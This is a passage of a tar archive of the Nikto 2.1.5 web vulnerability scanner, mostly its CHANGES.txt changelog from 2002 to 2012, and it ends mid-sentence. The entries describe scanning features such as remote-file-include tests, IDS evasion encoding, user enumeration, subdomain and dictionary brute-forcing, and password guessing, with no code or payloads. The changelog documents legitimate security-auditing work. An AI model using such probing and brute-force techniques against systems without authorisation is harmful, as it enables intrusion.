nikto-2.1.5/0000755000000000000000000000000012025512046011336 5ustar rootrootnikto-2.1.5/docs/0000755000000000000000000000000012025545720012273 5ustar rootrootnikto-2.1.5/docs/nikto.dtd0000644000000000000000000000303311671104260014107 0ustar rootroot nikto-2.1.5/docs/CHANGES.txt0000644000000000000000000012156612025545720014117 0ustar rootroot2012-09-16 Nikto 2.1.5 release - Ticket 261: Update CSV report to include banner info and put data into proper columns - Ticket 247: Move etag header check to postfetch so no additional requests are made - Ticket 245: Liberal use of CDATA in XML report to prevent problems. Thanks to Peter Wang for reporting. - Ticket 242: nikto_headers.plugin now uses nfetch instead of direct LW calls - Ticket 234: Add plugin for crossdomain.xml (and clientaccesspolicy.xml) to look for wildcards and warn about entries - Ticket 233: Fix bad values in robots.txt from causing crashes - Ticket 229: Don't repeat XML headers if appending to an existing report file, thanks to digininja for idea - Ticket 228: Add client SSL certificate support. Thanks to monnerat for code submission! - Ticket 226: Add GMT offset to time outputs - Ticket 225: Template variables now have terminating hash to prevent collisions - Ticket 224: Space in robots.txt kills scanner - Ticket 222: Fix problems with banner parsing related to spaces, should result in fewer missed matches which should be hits. - Ticket 220: Certificate wildcard matching incorrect - Ticket 217: Add -IgnoreCode option to allow db_404_strings' @CODE at the command line - Ticket 214: Relocate databases to 'databases/' directory from 'plugins/' - Ticket 211: Shuffled some information in HTML report and added more summary data. Added error count and total check count to XML (note: DTD change). - Ticket 209: Find IPs in HTTP headers - Ticket 202: -maxtime maximum execution time per host (seconds) - Ticket 175: -until run until specified time or duration - Ticket 174: Checked for sites parked at hosting providers or advertising pages - Ticket 161: robots.txt now checks for listed files (content search, etc.) - Ticket 91: Identification of WEBrick fails. Updates made to handle banners with multiple items but no spaces - Ticket 74: Removed 'single' mode code from nikto. There are better tools for this nowadays. - Ticket 57: nfetch no longer uses global request/response hashes - Ticket 1: Save full response on positive, plaintext & JSON - Completely remove cache functionality as it was near worthless and added a lot of overhead - Change cache to include full request and response - Including JSON-PP source to not require JSON installation. http://search.cpan.org/~makamaka/JSON-2.53/lib/JSON/backportPP.pm - Add IP address to CSV output. NOTE: this changes a parse-able report format! - add_vulnerability now takes in %request and %response for saving of data - nfetch() now returns headers received as argument 6--no more hash reference over-writing headers to send - Added sub get_ips() to centralize IP extraction from strings - Output file name now takes '.' which will auto-generate output filename like nikto_hostname_port.EXT - Fix -root not appearing in report output, reported by Cédric Michel - nikto_favicon.plugin checks for icons in tags - Add check for non-empty OPTIONS response body, which could be related to something like http://zacstewart.com/2012/04/14/http-options-method.html - Add nikto_paths.plugin to look for things to add to db_variables values - Items found in robots.txt are now added to values from db_variables - Keep tokens from getting into %db_extensions, thanks to Erik Cabetas - Fix vhost not being set properly, thanks to Brian Poole - Fix crash on invalid regex chars in robots.txt (dis)allow lines - Default to use Net::SSL instead of Net::SSLeay as a result of too many memory issues in SSLeay 2011-06-14 - Fix condition where match_1 or match_1_or are 4xx response code - Fix condition where blank prefix added via change_variables - Fix some cases where root dir not showing up in screen/report output 2011-03-30 - Ticket 208: Strengthen IP matching in cookies (nikto_cookies.plugin) - Ticket 207: -findonly emulation now enables reporting plugins and screen output mimics versions < 2.1.4 - Ticket 199: Allow user to specify SSL library to be used by LW2 - Ticket 198: Add -Userdbs to run only user databases. 'all' loads all user databases and no standard. 'tests' or nothing only loads udb_tests instead of db_tests - Fix date_disp for incorrect mday increment, thanks noop.0352.ja for notification - Print web ports found in gnmap input files, thanks @mubix 2011-02-20 Nikto 2.1.4 release - Tickets 148, 160, 188: XML CHANGES: - Removed 'cyphers' from DTD (was never populated via the code) - The 'niktoscan' element is now included (was in schema, but unused) - 'niktoscan' new variables: scanstart, scanend, scanelapsed - removed from templates (duplicate of hoststest) - removed from DTD - Removed duplicate element from xml_summary.tpl - Properly close - Incremented nxmlversion to 1.1 - Tickets 202, 203: Rewrote set_targets to not accidentally collapse targets, which fixed terminate signal issues - Ticket 201: Rewritten & fixed authorization code work better and make fewer requests - Ticket 195: Update interactive status counts if mutate options are used - Ticket 194: Look for internal IPs in cookies - Ticket 192: Relabel IDS evasion as 'encoding techniques' - Ticket 186: Enable sleep for fractions of seconds - Ticket 185: Make multiple index file output links in html reports - Ticket 184: Fix -root option - Ticket 181: Fix COOKIE set via nikto.conf. Also allow multiple cookies. - Ticket 179: Update docs for -useproxy - Ticket 178: Add -Interactive-off to disable interactivity - Ticket 177: Enable http keep-alive - Ticket 173: Skip current host with 'N' in interactive mode - Ticket 169: Allow regular expressions in db_tests - Ticket 155: -findonly is deprecated in favor of -Plugins "@@NONE" (-f will replicate this functionality) - Ticket 82: Auth is now checked per realm, not per resource - Fix parsing of nmap greppable output so that any port descr matching http is checked. Thanks Moses Hernandez & @mubix for reporting & testing. - Fix a potential div by zero error - Fix a potential for false positives or negatives with version matches - Various cleanups in nikto_report_xml.plugin and nikto_report_html.plugin - Not all udb* files were loaded properly - Server name not properly printed in update/submission output - Created $mark->{'components'} to store server build items instead of @BUILDITEMS - Variable consolidation & memory usage cleanup - Move message on -root from notices to target host info (suggestion from YGN) - Automatically escape invalid regexes in databases at run-time, so no dying - Validate regex field syntax on -dbcheck - Move -root option to %mark so it works on a per-host level if passed via URI - Added nikto_ssl.plugin to check cert's CN vs hostname - Add basic retry on error in nfetch() - Change how db_404_strings are used by moving where they are checked--should reduce FP - Fix missing url sent to rm_active_content during error mapping--should prevent many FPs - Actually check for code-based nocache flag in cache_add and cache_fetch - Make nikto_multiple_index.plugin only look at 200 responses 2010-09-06 Nikto 2.1.3 release - Ticket 164: Error when proxy starts to give 502 - Ticket 165: Don't show incorrect # of items checked in -findonly - Ticket 166: Allow interactive pause - Ticket 167: Update manual - Ticket 168: Fix scan not working behind proxy when domain can't resolve - Ticket 170: Implemented MSF output - Ticket 171: Allow proxy to be specified on command line - Fix incorrect running of some plugins - Interactive status report gives guess of time remaining - Don't print duplicate findings (such as indexing) - Minor standardization stuff - Documentation updates - Fixed broken cache - Cleaned up status report code - Version output now shows status of SSL and XMLRPC availability 2010-07-07 Nikto 2.1.2 release - Ticket 8: Interactive scan status. - Ticket 122: Cleanup db_404_strings to prevent over-matching. - Ticket 122: Use db_404_strings as a higher priority. - Ticket 125: fetch is dead, long live nfetch! - Ticket 126: subdomain plugin tries to guess domain on unqualified hostname. - Ticket 127: dav methods are treated specially and reported all at once. - Ticket 129: Change references for config.txt to nikto.conf. - Ticket 130: Added -D E to show HTTP errors, otherwise suppress. - Ticket 132: Properly check for HTTP and HTTPS ports in cache. - Ticket 133: Regular expression matching causes errors. Removed char_escape and some other regexs in favor of the faster quotemeta(). Also set many regexs to non-capturing for speed. - Ticket 134: Added documentation of -config to usage_short. - Ticket 136: Moved set_scan_items to only run once, should speed things up with multiple targets. - Ticket 137: Added -ask to override nikto.conf's UPDATES value (same options). - Ticket 139: Partial fix: Moved URI error handling and reporting result to nfetch, rather than being in nikto_tests. - Ticket 141: pre-compile RE in content_search to give some speed-up. - Ticket 142: Enhancement to allow easier addition of hooks. - Ticket 144: Cleaned up map_codes to use general rules, still needs some for redirection. - Ticket 145: Added OSVDB 0 to orphan items in db_tests. - Ticket 146: Paritial fix: with new "start" hook which is run at the start after target enumeration. - Ticket 147: Grab HTTP information on the fly, deprecate get_banner. - Ticket 150: Special characters in XML output. - Ticket 152: HTTP Version set in nikto.conf over-ridden. - Ticket 153: Properly check for HTTP and HTTPS ports in cache. - Ticket 156: Update system couldn't update nikto_core.plugin. - Ticket 163: Scan details not appearing in XML reports. - Allow changing certain config settings during scans. - Optimized rm_active_content() a little by shuffling code and reducing some mem copies/regexs. Needs more work. - Update nikto.conf to switch tests to always have the (report:500) parameter. - Updates to read known headers on the fly, rather than make requests for them. - Fixed a bug with the order of parameters in hooks (broke parameters being passed to some plugins). - Added the parameter "report" to tests plugin to report when completed x number of tests. - Stop LibWhisker producing an error when talking HTTP to HTTPS during port_check. - Merged apacheusers and apache_enum_users. - Add facillity for a plugin to inform which options it can take. - Added nbe output plugin which written by Frank Breedijk of the Seccubus project. - Moved do_auth to a postfetch plugin. - Removed dead code from fetch(). - Optimizations in nfetch(), nikto.pl, & elsewhere. - Added support for prefetch and postfetch hooks. - Moved content_search to a plugin. - Some tuning around plugin execution. - Updated user_enum_apache to use Plugins instead of mutate. - Rewrote the macro expanding bit to make it more efficient. - Mutate 1 now wrapped into nikto_tests and doesn't take up anywhere near the amount of memory! - Starting to deprecate mutate by replacing with plugin options. -mutate 2 (passfiles) is now implemented within tests and uses less memory. - Updated -check_updates to use nfetch instead of fetch. - Updated -Plugins support. - Add filename support to rm_active_content. - Added basic support for -D s (scrub, removes some information from the log). - Match plugin names case-insensitive. - Warn if RFIURL is undefined. 2010-01-20 Nikto 2.1.1 - Ticket 117: Fixed SKIPPORTS - Ticket 116: Moved User-Agent string to nikto.conf - Ticket 116: Added dynamic variables to User-Agent (Testid, Evasion methods) - Ticket 95: Added support for OSVDB, now the fun bit of filling it in - Ticket 111: Basic syntax checks for all databases - Ticket 109: Added an extra optional element to xml output to contain the SSL date. Need to do similar for html, txt and csv - Ticket 106: Shorts authentication being successful if an error is returned - Ticket 107: Support for short reads in LW2.5 - Ticket 98: If -Format is missed guess the format based on file extension in -output. Default is none if -output is omitted. - Ticket 96: Multiple index file enhancements for groups and better unique file identification - Ticket 103: content in xml report is now wrapped in CDATA - Ticket 110: Mutate now respects db variables - Ticket 97: Fix for response caching - Ticket 99: Spelling disagreements between Brits and Americans - Added @RFIURL to nikto.conf for a remote file include location, and supporting code. - Added ~2300 RFI tests from the combined RSnake/OSVDB list - Removed NMAP and NMAPOPTS from nikto.conf as it is no longer used/supported - Reporting: simplify xml/html code, fix a bug when a space is in the uri, and load ony needed templates - Enable 2 new LW evasion tacticts (carriage return or binary value as request spacer) - Added support to select plugins via -Plugins and -list-plugins option to list current plugins - Major bug fix for proxy usage - Don't report p3p header as unusual - Various changes to aid future binary db usage for mutates - Various changes to aid future multi-threading - Fix for multiple index files 2009-12-21 nikto.pl - Ticket 100: Fix for reading home directory on Windows - Some new additions to db_realms and db_embedded 2009-08-29 templates/xml* docs/nikto.dtd - Added tag for scan/host statistics 2009-08-25 plugins/db_httpoptions - Ticket 89: - remove TRACE and TRACK from the db 2009-08-19 plugins/nikto_headers - Added test for asp source code disclosure through the Translate header 2009-08-13 plugins/* plugins/nikto_embedded plugins/db_embedded - Various fixes to use nfetch and fix proxy use - New plugin added to identify embedded devices 2009-08-12 plugins/nikto_core - New fetch (nfetch) sub added which uses a local request/result hash. All requests should use this instead of fetch. - Patch to add a URI cache within fetch, can be disabled with -nocache 2009-08-04 plugins/nikto_core - Patch to actually report the URI when it works out a password - Added test for DEBUG HTTP verb 2009-08-03 plugins/nikto.pl - Put in a quick catch for port ranges (e.g. 80-90) if people use the old style of port entries - Put in a simple signal handler to close reporting if a sigint is caught 2009-08-02 plugins/nikto_multiple_index db_multiple_index - Added check for multiple index files for request #16 - Turned standard headers into a database file to close off #22 2009-08-01 plugins/* nikto.pl - Fixes for xml reporter to allow multiple hosts - Fixes for html, txt and csv exporters - Tickets 80 and 85 2009-07-31 plugins/* nikto.pl - Fix for ePO agent/HP iLO to not report for each known type of webserver - Big changes to the way nikto assigns targets to remove globals, have deliberately broken nmap scanning and allowing port ranges. 2009-07-20 plugins/nikto_core plugins/nikto_outdated db_tests db_outdated - Fix to ensure that -Tuning works as expected, fixes ticket #84 - Fix to add a warning if a web server has been configured to restrict information on its server banner, fixes ticket #66 - Minor amendment to lightttpd version to fix ticket #67 - Fix to nikto_core to make dbcheck work! - New item for ticket #75 2009-06-30 plugins/nikto_dictionary_attack - Add plugin to use dirbuster lists with mutate 6 and mutate-options - couple of minor fixes to prevent errors on Windows and exporting as text 2009-06-27 plugins/nikto_user_enum_cgiwrap.plugin - Managled cgiwrap and apache plugins together and allow use of a dictionary (to speed things up). Also made it work with new reporting style - Added -mutate-options switch 2009-06-15 plugins/nikto_reports.plugin templates/xml_end - Fixed bug with xml not terminating correctly 2009-05-11 plugins/nikto_core.plugin plugins/nikto_subdomain.plugin - Added subdomain buteforcer as mutate option 5, thanks to Ryan DewHurst - Added extra tests to pull information if scanning ePO agent or HP WBEM - Added test to recognise a Dell Remote Access Console - Added -no404 switch to disable 404 checking. Warning, this produces a lot of false positives at the moment 2009-01-10 plugins/nikto_core.plugin - Added fix for #73 to apply multiple variables for tests, supplied by Laurent Licour - Removed test_target function as now done in the nikto_test plugin - Added support for Allow directive in robots.txt - Added exit if cannot connect to a defined proxy 2008-11-11 plugins/nikto_core.plugin nikto.pl plugins/nikto_reports.plugin - Added report phase to plugin runner 2008-10-09 plugins/nikto_core.plugin nikto.pl - Further tunings to authentication code to simplify it. 2008-10-02 plugins/nikto_core.plugin nikto.pl - Altered authentication code to make it simpler. - Now supports NTLM authentication. 2008-09-24 plugins/nikto_core.plugin db_tets - Fixed problem with nikto using authentication provided from the command line. It now adds it to the list of realms. - Added extra test to highlight localstart.asp if it is the default page. - Added tests to identify Ampache. 2008-09-23 plugins/*.plugin - Added support for conditional recon and scan plugins. 2008-09-21 plugins/*.plugin - Changes for new plugin running structure; it needs to be finished (conditional plugins and report methods) but it is good enough to release now. 2008-09-20 plugins/nikto_core.plugin plugins/nikto_cgi.plugin nikto.pl plugins/nikto_reports.plugin templates/xml_host_head.tmpl docs/nikto.dtd - Fixes to ensure nikto produces less perl warnings - Fix for ticket #59: add vhost to xml output 2008-09-16 plugins/nikto_core.plugin plugins/nikto_httpoptions.plugin - Fix for ticket #37 - Allow fetch to optionally call LW2::http_fixup_request - Better handling of extra headers within fetch 2008-09-14 plugins/db_server_msgs plugins/nikto_*.plugin - Update server messages to dynamic database format - Altered all plugins to use a separate RESULTS array for storing results; meaning that it is easier to abstract - Added add_vulnerability method to nikto_core to report vulnerabilities and reduce code size. - Added ability to add an extra hash to fetch() to allow extra headers to be added. 2008-09-12 plugins/nikto_core.plugin plugins/nikto_httpoptions.plugin plugins/db_httpoptions plugins/nikto_favicon plugins/db_favicon - Fix for ticket #38: httpoptions are drawn from a database - Now setup to allow dynamic databases, rather than all being imported by nikto_core at start time - Altered favicon database to use dynamic database 2008-09-06 plugins/nikto_core.plugin tmpl/htm_close.tmpl - Fix for ticket #53: all plugins now show last mod date - Fix for ticket #51: updated copyright date in HTML 2008-09-04 plugins/nikto_core.plugin - Ticket 55: introduced by the solution for ticket #44 - Ticket 53 2008-08-12 plugins/db_outdated -- Nikto 2.03 - Fix for Jetty to latest version, fixes ticket #49 2008-08-07 docs/nikto_manual.html - New export of the manual from the docbook - Updated versions in nikto.pl 2008-08-06 plugins/db_outdated - Added various new versions 2008-08-05 plugins/db_favicon - Fix for ticket #45 - Added favicons for Roku Soundbridge and Ampache 2008-07-14 plugins/nikto_headers.plugin - Changes to look at non-standard headers - Changes to examine Apache's ETag header 2008-07-07 nikto.pl plugins/nikto_core.plugin plugins/nikto_reports.plugin - Fix for ticket #41 - a rather nasty bug that's been in nikto 2 since its inception; where variables weren't fully expanded. 2008-07-02 plugins/nikto_core.plugin - Fix for ticket #11 - change CGIDIRS test so that they're not hardcoded. The reponse codes are now kept in a variable in db_variables - Applied same to enumerating apache users plugin - Fix for ticket #39 - we now check whether getoptions failed, show usage and exit with a code of one. This also means that it will exit gracefully if a parameter is missed out when one is required. 2008-06-24 plugins/nikto_core.plugin - Fix for ticket #35 - allow multiple HTTP methods to identify an HTTP server, these are set with the variable CHECKMETHODS in config.txt - Fix for a bug in the nmap reader where it would ignore the IP address if it nmap didn't return a hostname. 2008-06-22 plugins/db_tests - Fix for ticket #26 - stop domino tests producing false positives 2008-06-20 plugins/nikto_httpoptions.plugin - Fix for ticket #30 - ensure that propfind has the right OSVDB tag 2008-04-22 plugins/nikto_outdated.plugin - Change to allow stop duplication of items when scanning more than one host. Fix for bug 28 2008-04-16 plugins/nikto_core.plugin - Change to allow reading of a host list from stdin - Fix for enhancement 10: read from nmap output (only -oG) 2008-04-15 plugins/nikto_core.plugin - Fixes for bug 25: Unopen ports are now reported 2008-04-14 templates/htm* - Fixes for bug 24: HTML output is now valid HTML 4.01 Strict 2008-04-11 nikto.pl - Started using international dates instead of the weird US format - Added a fix for bug id 23: allow a range of ports instead of a comma separated list 2008-04-11 db_outdated - Updated current version of Apache to 2.2.8 01.06.2008 2.02 - Added XML output thanks to the work of Jabra. XML format comes from templates (same as HTML). See the 'templates' dir for more info. - HTML reports changed by Jabra to remove some oddities and remove HTML from items - Fixed non-reporting of non-HTTP ports (or closed ports) when at least one port was HTTP. - Removed experimental knowledge base (KB) code, as XML output is more flexible for long-term scan tracking - Added unique identifiers to all tests from databases, and all tests created in code - Updated documentation 01.02.2008 nikto_core - Fixed improper parsing of long options (-update, etc.). Thanks to Frank Breedijk for figuring this out. 12.30.2007 db_servers - Removed as it is not used 12.19.2007 nikto_msgs.plugin - Add a boundary for regex on versions to cut down false positives 12.19.2007 niko_favicon.plugin - Added OSVDB ID 12.18.2007 niko_favicon.plugin - Fix false positive when favicon.ico doesn't exist 11.22.2007 Nikto 2.01 release - Fix anti ids encoding use. thanks to Francisco Amato - Fix virtual host usage if set via CLI. thanks Jon Hart - Fix Host header restoration when testing for IIS IP leak - Fix for plugindir & templatedir if EXECDIR is set in config.txt, thanks Shiraishi.M and Will Andrews for pointing it out. - Fix count of items--count now accurately reflects the number of items, not just number of vulns. thanks Frank Breedijk - Kick a few more things to KB that should be saved - Added SKIPIDS to config.txt to completely ignore some tests loaded from db_tests. Suggested by Christian Folini. - Enhanced rm_active_content to try to exclude the file/QUERYSTRING requested - Unset the auth header after guessing at it. Thanks Paul Woroshow for reporting the bug. 11.12.2007 nikto_headers.plugin - Fix internal IP address snarfing for IIS, thanks Frank Breedijk for pointing it out 11.10.2007 Nikto 2.00 release - Rewrite of nikto_httpoptions.plugin to read the Public header - Fixups to prevent namespace violations in nikto.pl and nikto_core.plugin - Add some normalizations to the -root option variable, suggested by Erik Cabetas - Added -Display with options for suppressing redirects & cookies from being included in output - Added -Tuning options to let users specify what they would like to test, or exclude certain categories - Added config.txt's NMAPOPTS, thanks Sean Lewis for the suggestion - All new HTML report - Bugfix: a found cookie would report for every port/server after it was found - Bugfix: all hosts scanned with all ports if hosts file used - Bugfix: all hosts scanned with port 80 despite what the user wanted - Bugfix: Reverse DNS inet_aton error fix, pointed out by Jason Peel @ Foundstone - Changed auth checking so it will test any directory found, not just /, and removed nikto_realms.plugin as a consequence - Changed scan_database.db format significantly (and name), (and all the code to deal with tests) - Completely new 404 engine which causes less false-positives (see docs) - Created dump_lw_hash instead of dump_request_hash & dump_result_hash - Implemented a knowledge base which (should) store all the gory details of scans... probably use this later ;) - Moved pre-defined variables from config.txt to variables.db so they can be automagically updated. Entries in config.txt are still read. - Removed %CFG, storing vars in %NIKTO instead - Removed -generic - Removed extraneous global vars - Removed load_realms, combined with load_variables - Replaced %CONFIG with %NIKTOCONFIG - Set MAX_WARN to trigger on any response code, skipping 404|403|401|400 to avoid common ones - Added -Single single request mode - Updates to use the RFP's LibWhisker 2.0 - Added -Help to show extended help ouput, changed default help screen to be shorter. Suggested by Jericho. - Additional error checking on invalid reverse-dns (Paul Woroshow) - Cleaned up comment/line parsing routines in multiple places, from Erik Cabetas - Tightened some for loops with real values instead of guessing, from Erik Cabetas - Addded error message if no host is specified, from Erik Cabetas - Added more robust output file type checking (txt/htm/cvs), from Erik Cabetas - Added more debug statements regarding which CGI directories will be scanned, from Erik Cabatas - Bugfix: more 'half dead host' scanning issues resolved with Jericho. LW is much pickier now about calling http_close - Added error if -F specified without -o, from Erik Cabetas - Bugfix: server category match no longer matches partial strings, from Erik Cabetas - Bugfix: mis-pasted line, pointed to by Erik Cabetas - Send all errors to STDERR - Added -config option to specify a config file, thanks to Pavel Kankovsky - fixed regex issue on banner. thanks Alexander Ehlert for pointing it out - All other plugins updated for v2 changes - Added favicon.ico hash checking - ... gobs more 02.06.2004 nikto_core.plugin 1.21 - Cleaned up comment/line parsing routines in multiple places, from Erik Cabetas - Tightened some for loops with real values instead of guessing, from from Erik Cabetas - Removed duplicate bit of code, from Erik Cabetas - Addded error message if no host is specified, from Erik Cabetas - Added more robust output file type checking (txt/htm/cvs), from Erik Cabetas - Added more debug statements regarding which CGI directories will be scanned, from Erik Cabatas 12.17.2003 nikto_core.plugin 1.20 - Fixed BID links, thanks Richard Tortorella for the report. 10.27.2003 Nikto 1.32 release nikto_core.plugin 1.19 - Removed unecessary 'use IO::Socket' call from resolve() - Removed unecessary counters - Replaced some slow foreach counters - Moved proxy_check earlier, before port_scan, so it will be set first - Removed -allcgi option in favor of -CGIdir, which can specify to test 'all', 'none' or a specific directory. - Bugfix: testing through proxy by making sure host name is set instead of ip, thanks to Fabrice Annic for the catch - Bugfix: a regex/logic/if error in test_target, thanks Pavel Kankovsky for the bug report. 401/302 messages will now report regardless of test/pass fail. - Bugfix: -dbcheck now identifies duplicates without relying on message text, thanks Jericho / Attrition.org for pointing this out nikto.pl 1.12 - Rearranged order of get_banner & setup so that it would be called right nikto_headers.plugin 1.08 - Added DAAP header check 10.02.2003 nikto_core.plugin 1.18 - Fixed get_banner to properly handle multi host/port scans 10.01.2003 nikto_outdated.plugin 1.12 - Fixed improper matching in version evals, reported by Paul Bakker 09.30.2003 nikto_core.plugin 1.17 - Reordered loop code to make -f scans faster. - Added a skip for "(Win32)" in the version updates back to cirt.net nikto_outdated.plugin 1.11 - Stripping () from version strings 09.24.2003 Nikto 1.31 release nikto_core.plugin 1.16 - Fixed a bug in resolve() that may prevent name lookups when host files used - Fixed a bug in resolve() where scan would exit if 1 name resolution from host file failed - Changed set_targets so that if the -h value exists as a file it reads that instead of resolving it as a name. This eliminates need for .csv or .txt file name endings. - Added auto or semi-auto update of version strings to CIRT.net. This is done through a simple GET request. Controlled via config.txt's UPDATES variable. *ABSOLUTELY NO* server info is sent... only versions from HTTP headers, i.e. "Apache/4.0". Thanks to Jericho for feedback/ideas. - Added a host counter output at end & for every 10 hosts - Set CHANGES.txt download only on *code* updates, not DBs - Added MAX_WARN to config.txt for warning level on OK/Moved messages, thanks Jericho for the suggestion. - Added PROMPTS to config.txt to allow user control of prompting--good for unattended scans - Added a regex test to dbcheck() better catch errors in server_msgs.db - Thanks again to Jericho for many updated tests/information. - Cleaned up port scan code - Fixed/improved scanning through proxies nikto_outdated.plugin 1.09 - Added support for sending updates of version strings to CIRT.net. See nikto_core.plugin version 1.15 notes. LW.pm - 1.8 - Updated to LW.pm v1.8, see the change log included with it (www.wiretrip.net/rfp/). nikto.pl - 1.10 - Implemented versioning on nikto.pl (!), many changes to support core 1.15 - Put 'require LW.pm' down *after* we know where it is.. duh. Thanks J Barber (ussysadmin.com) for the suggestion. Also changed it 'require' vs 'use' so in the future I can update it, if necessary. - Hosts are now tested in the same order as the appear in an input file 08.18.2003 nikto_outdated.plugin 1.08 - Fixed nasty regex bug in the version eval, and made more efficient. Pointed out by fr0stman, thx Zeno for assistance 07.22.2003 nikto_headers.plugin 1.07 - Added Host header back after delete in IIS Content-Location check. Thanks to Abdi Ponce for the bug report & debug. nikto_httpoptions.plugin 1.04 - Changed PROPPATCH, TRACK, TRACE messages. Changed PROPFIND message, thanks to Jericho for tracking down some good info on it. Added SEARCH message. nikto_core.plugin 1.14 - Added tags to the HTML output for browser-neatness - Removed a stray debug print 07.03.2003 - Thanks to Jeremy Bae for many Jeus Webserver tests. 06.29.2003 nikto_core.plugin 1.13 - changed some &function calls to function() to keep $_ from being passed down another level.. thanks to zeno for the heads-up. nikto_headers.plugin 1.05 - fixed the IIS4 content-location check as it had a tendency to fail miserably... 06.29.2003 nikto_core.plugin 1.12 - changed output of dump_request to be more like normal request text 06.29.2003 nikto_core.plugin 1.11 - bug fix for scanning through proxies 06.19.2003 nikto_core.plugin 1.10 - added 'csv' to file formats in -help output (doh!) - minor speedups 06.17.2003 nikto_user_enum_apache.plugin 1.02 - Bugfix: some user names not tested (zz, zzz, etc.) - Major rewrite for speed improvements nikto_user_enum_cgiwrap.plugin 1.01 - Bugfix: some user names not tested (zz, zzz, etc.) - Major rewrite for speed improvements 06.16.2003 nikto_core.plugin 1.09 - dbcheck option enhanced: check that all plugins are in the order file - dbcheck option enhanced: check that all plugins have properly named sub calls - update option enhanced: retrieves updated CHANGES.txt file with code updates - Bugfix: resolve() did not properly catch invalid IP addresses. Reported by Rick Tortorella. 06.12.2003 nikto_core.plugin 1.08 - Removed iprint() entirely (finally) - Made "Needs Auth" links active in HTML output 05.30.2003 nikto_core.plugin 1.07 - Bugfix: 05.30.2003 nikto_core.plugin 1.06 - Added number of elapsed seconds to final host/port output - Bugfix: Changed CAN/CVE link to point to cve.mitre.org instead of ICAT - Bugfix: Duplicate port 80 in nmap options if -p not specified but 80 specified in hosts file 05.28.2003 nikto_core.plugin 1.05 - Bugfix: -update code prevented automatic updates. Found & fixed by Keith Young. Also reported by Paul Worshaw. 05.27.2003 Nikto 1.30 release General changes - removed nikto_google.plugin entirely (may add better plugin later) - major "under the hood" changes to make things easier to maintain, read & modify - killed as many global vars as I could stand in favor of a few global hashes (CLI input, etc.) - added $CURRENT_HOST_ID and $CURRENT_PORT as globals--these are the pointers to "where you are" (mostly as in $TARGETS) - added the ability to have basic conditional items for tests, i.e. "200!index" to designate a response of "200" but the content does not contain "index" (suggested by Paul Woroshow). - added -V option, which displays versions of all code files & databases (suggested by Jericho) - specifying -ssl now forces *all ports* on *all servers* to use ssl. best that can be done for now. - added multi-host support via a text file with port specification in the file or via CLI - all new save file routines - unbuffered file output to keep partial/cancelled run data - removed the -w option in favor of -F with multiple formats - added support for NTLM authentication - added cgiwrap plugin nikto_core.plugin 1.05 - Many updates to support multiple host scans - Added UA for update agents - Changed all %SERVER hash refs to either %CLI or %TARGETS - Removed %BANNERS (now in %TARGETS) - Added set_targets() to handle various target input methods - Bugfix: non-SSL ports not found after first SSL port found on a host - Bugfix: authentication realms were not checked with the proper root if -r was specified on the CLI - Bugfix: can't call 'fprint' if core plugin is not found (duh!). Found by Erwin Paternotte. nikto_user_enum_cgiwrap.plugin 1.00 - added nikto_mutate.plugin 1.05 - change for using %CLI nikto_passfiles.plugin 1.01 - change for using %CLI nikto_user_enum_apache.plugin 1.01 - change for using %CLI - renamed from 'nikto_userenum.plugin' nikto_msgs.plugin 1.03 - minor changes for multi-host support plugins_order.txt 1.03 - removed nikto_google.plugin 02.23.2003 nikto_core.plugin 1.04 - Added a work around for servers that answer with blank www-authenticate headers with invalid id/pass combos nikto_realms.plugin 1.00 - Added to distro realms.db 1.00 - Added to distro plugins_order.txt 1.02 - Added nikto_realms.plugin 01.22.2003 nikto_httpoptions.plugin 1.03 - standardized wording, added TRACE option, added more description to WebDAV msgs (thanks Jericho at attrition.org). 01.22.2003 nikto_core.plugin 1.03 - fixed a bug with matching proper server categories, thanks to Paul Woroshow. 01.17.2003 nikto_core.plugin 1.02 - fixed the GetOptions only looking for "-gener" instead of "-generic", thanks to Michel Arboi 01.02.2003 nikto_core.plugin 1.01 - fixed proxy authentication not prompting for -update option 01.01.2003 Nikto 1.23 - added nikto_plugin_order.txt to force plugin order to something we want rather than alpha - added nikto_core.plugin & removed most functions from nikto.pl - added -cookies option - enhanced db syntax error checking (spurred by syntax problems Thomas Reinke found) - started using the LW 1.6 libraries - fixed infinite loop output problem (no longer wrapping long lines) - removed usage from saved output (too long) - remove nikto_frontpage.plugin and put checks in scan_database.db - moved server categories from scan_database.db to servers.db - got rid of the leading "c," requirement from scan_database.db - added STATIC-COOKIE config item as suggested by Eyal Udassin - made CLI options case sensitive (to support more options, hosts files, etc) - added Javier Fernandez-Sanguino Pen~a's Apache user enumeration plugin - added -r (-root) file prepend as suggested by Eyal Udassin - many DB typo fixes from Jay Swofford - fixed a regex bug in nikto_robots.plugin and nikto_apacheusers.plugin - new update location (path) to better support upgrades that don't effect db syntax 08.21.2002 Nikto 1.21 - Fixed all the proxy code--none of it was working due to where it was set in the initialization. - Added -update to the help output. Not sure why it wasn't there. 08.12.2002 Nikto 1.20 - Re-packaged to take out a testing line from LW.pm. Thanks to D Rhoades for the catch 08.11.2002 Nikto 1.20 - Moved all mutate options to plugins - Added password file mutate plugin - Added better error messages if problems arise - Test for false-positives on all CGI directories - Added -useproxy CLI - Printing SSL certs the server accepts - Fixed port sorting if -f is used - Forked 1.20DCX edition for DefCon 10 CD: difference is only output - Fixed a bug where "findonly" was referenced as "findports" (thanks J DePriest) - Added properly wrapped text output in saved files 05.25.2002 Nikto 1.100 - stopped nikto from dying if no config.txt file found - added Apache user enumeration plugin - added robots.txt plugin - set false-positive message to display at end of run as well as during 04.23.2002 Nikto 1.10BETA_3 - fixed CAN/CVE links, added BID/CA/MS links (suggested by Jericho). - prints total number of 'issues' found (suggested by Jericho). - fixed proxy usage in the cirt.net update function. - updated to use LW 1.4, which fixes an SSL infinite loop problem. - fixed 401 auth suppression (broken in beta 2). - added robots plugin to examine robots.txt & add items found to the mutate check 03.31.2002 Nikto 1.10BETA_2 - fixed the config.txt DEFAULTHTTPVER variable setting so it really works - made proxy_check run only once per session - removed all reference to "nikto" in the scan_database.db 03.23.2002 Nikto 1.10BETA_1 - renamed plugins from .pl to .plugin, just for clarity. but they're still perl files - allowed nikto.pl to update plugins the same as .db files - usage of LW 1.2 - countless "under the hood" type things - lowercase-incoming-headers to more easily handle case sensitive nonsense - compartmentalized a LOT more code to make things easier to read - created config.txt file configuration w/o midifying nikto.pl itself - added user_scan_database.db so that it won't get ovwr-written if the user adds checks - enabled RFP's LibWhisker anti-ids options - change "check," to "c," in scan_database, just to save a little bandwidth on cirt.net :) - added plugin to check HTTP methods - created a 'mutate' mode for really brute force finding stuff on servers - added the ability to set default CLI options via config file - added PLUGINDIR config variable - added plugin to check other HTTP headers (just x-powered-by for 